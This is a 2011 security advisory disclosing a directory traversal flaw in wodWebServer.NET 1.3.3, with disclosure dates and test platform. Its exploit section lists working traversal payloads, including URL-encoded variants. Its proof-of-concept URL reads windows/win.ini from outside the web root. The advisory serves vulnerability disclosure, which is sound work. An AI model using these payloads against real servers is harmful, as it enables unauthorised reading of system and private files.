------------------------------------------------------------------------ Software................wodWebServer.NET 1.3.3 Vulnerability...........Directory Traversal Threat Level............Serious (3/5) Download................http://www.weonlydo.com/WebServer.NET/web-http-net-server.asp Vendor Contact Date.....3/13/2011 Disclosure Date.........3/27/2011 Tested On...............Windows Vista ------------------------------------------------------------------------ Author..................AutoSec Tools Site....................http://www.autosectools.com/ Email...................John Leitch <john@autosectools.com> ------------------------------------------------------------------------ --Description-- A directory traversal vulnerability in wodWebServer.NET 1.3.3 can be exploited to read files outside of the web root. --Exploit-- ..%5C/ ..%2F/ ..%2E/ ..\/ ..// .../ ..\ ../ --PoC-- http://localhost/..%5C/..%5C/..%5C/..%5C/..%5C/..%5C/..%5C/..%5C/windows%5C/win.ini